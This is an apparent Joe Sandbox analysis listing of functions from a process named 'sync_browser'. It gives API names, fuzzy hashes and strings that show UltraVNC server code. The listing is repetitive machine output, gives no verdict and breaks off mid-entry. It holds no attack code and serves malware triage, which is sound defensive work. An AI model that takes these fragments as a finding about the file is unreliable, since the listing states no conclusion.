                                                                      Function 00007FF7E507C6A0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                                      • API String ID: 0-3750121419
                                                                      • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                      • Instruction ID: b243fd631948adf708e5e51d802036edd3107322fc63ede5e93ea0a71d37517a
                                                                      • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                      • Instruction Fuzzy Hash: A031E325B0468940EA10FA76A8242B9A790FB45FF4F940336FE3D87BD9DE7CD0818310
                                                                      Function 00007FF7E50842A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                      • String ID:
                                                                      • API String ID: 3945334538-0
                                                                      • Opcode ID: 26b7556e4d0159b9d5f6cfb9e8541998bd234235d3a9044272faeac152b77cb8
                                                                      • Instruction ID: 503d519002c02e77b192ad57f8b320f97703786389e6384c66bfc476c7c8f616
                                                                      • Opcode Fuzzy Hash: 26b7556e4d0159b9d5f6cfb9e8541998bd234235d3a9044272faeac152b77cb8
                                                                      • Instruction Fuzzy Hash: 0D41F326B1894581EB10AB35F4607BDA351EBC8FA8F840132EF4D87799EE3CD481C351
                                                                      Function 00007FF7E512AA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                      • String ID:
                                                                      • API String ID: 2434734397-0
                                                                      • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                      • Instruction ID: 19ae3e066de2113932afc39ad3033c1d0442a171446d9c304a8524640664d1ec
                                                                      • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                      • Instruction Fuzzy Hash: E1315365A0864A81EA54B72878B0379E2826F41FA0FD14633ED2DC72D9DF7CE800D322
                                                                      Function 00007FF7E508FFA0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • malloc.LIBCMT ref: 00007FF7E508FFFD
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      • free.LIBCMT ref: 00007FF7E5090097
                                                                        • Part of subcall function 00007FF7E5128BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C0A
                                                                        • Part of subcall function 00007FF7E5128BF4: _errno.LIBCMT ref: 00007FF7E5128C14
                                                                        • Part of subcall function 00007FF7E5128BF4: GetLastError.KERNEL32(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C1C
                                                                      • free.LIBCMT ref: 00007FF7E50900BF
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E508FFE0
                                                                      • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF7E5090068
                                                                      • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF7E5090053
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                      • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                      • API String ID: 1063416079-3080451256
                                                                      • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                      • Instruction ID: f08a4980229debf5333b121241dc07e05fd8d96ef6b519fb709f3dcd112bddef
                                                                      • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                      • Instruction Fuzzy Hash: 2931652161868981EA50BB39E4642A9A351EF84FB0F945332F57EC76D9DE3CD4058361
                                                                      Function 00007FF7E51337C4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337CE
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337DC
                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133834
                                                                        • Part of subcall function 00007FF7E51332EC: Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133808
                                                                      • free.LIBCMT ref: 00007FF7E513382B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FF7E513381C
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                      • String ID:
                                                                      • API String ID: 3106088686-0
                                                                      • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                      • Instruction ID: bb2cb914938ba83a5c207938aab59bf30bfa72f3048cabb6d344d3fec5313c8c
                                                                      • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                      • Instruction Fuzzy Hash: 82017524A0974E82FB147F65F474239A2A1BF48F61F885235D91D823D9EE3CF805C636
                                                                      Function 00007FF7E51299D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3613856401-0
                                                                      • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                      • Instruction ID: 54f0e7c40d14dd8adfb766151090aff629affbca2241c0fc15c138e193f9640c
                                                                      • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                      • Instruction Fuzzy Hash: D601D41AE0C64A81FA147A69643137C91509F55F64FA50632EA28C21CBCE3CE881A362
                                                                      Function 00007FF7E508DEB0 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 2426525106-0
                                                                      • Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                                      • Instruction ID: 7b179b6a4fb8d567b048f992e6d43af96c213de4c4768ab868a7a1b85772a988
                                                                      • Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                                      • Instruction Fuzzy Hash: B401FF26618B45D2DA54EB66F9A1278B324FF88FC0B844032DA5DC3765DF3DE461C311
                                                                      Function 00007FF7E5080310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 2426525106-0
                                                                      • Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                                      • Instruction ID: bda249a51a12cafe7c649a1dbf1f82b1f823b7551804ed64e21f4b8ed4d16974
                                                                      • Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                                      • Instruction Fuzzy Hash: B001FF66618B45D6DA54EB66F9A1278A324FF88FC0B844033DA4DC3765DF3DE4A1C311
                                                                      Function 00007FF7E508DD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 2426525106-0
                                                                      • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                      • Instruction ID: bd1f754c487ff4c5e916f04d98b38799f427e05a941c855a22d6246e2c6a161d
                                                                      • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                      • Instruction Fuzzy Hash: BEF0B766A14A45C2EB50EF65E8A1168A324FF98F84B804032D90DC2269DF3DD856C321
                                                                      Function 00007FF7E509B810 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF7E509BA26
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$EnterFileRead
                                                                      • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                      • API String ID: 3826087893-1161645139
                                                                      • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                      • Instruction ID: 905779685c5155a6efbbfaad6fb753fe44f92df2b6a9c9de3ddd871de1c0ad90
                                                                      • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                      • Instruction Fuzzy Hash: 77B1D632A08A4585F754AF39D8603BD77A1EB84F68F544136EE1D8B6CDCE78D401C761
                                                                      Function 00007FF7E50C7530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                      • Instruction ID: ccdff83bd81f5787889ad04877836b2b568e8db9b686fd79b831802ca0dd6b1f
                                                                      • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                      • Instruction Fuzzy Hash: E831C931608B4A85E671EB25F4643AAA3A0FB86F94F944136EE9D83794DF3CD801C711
                                                                      Function 00007FF7E50C72F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
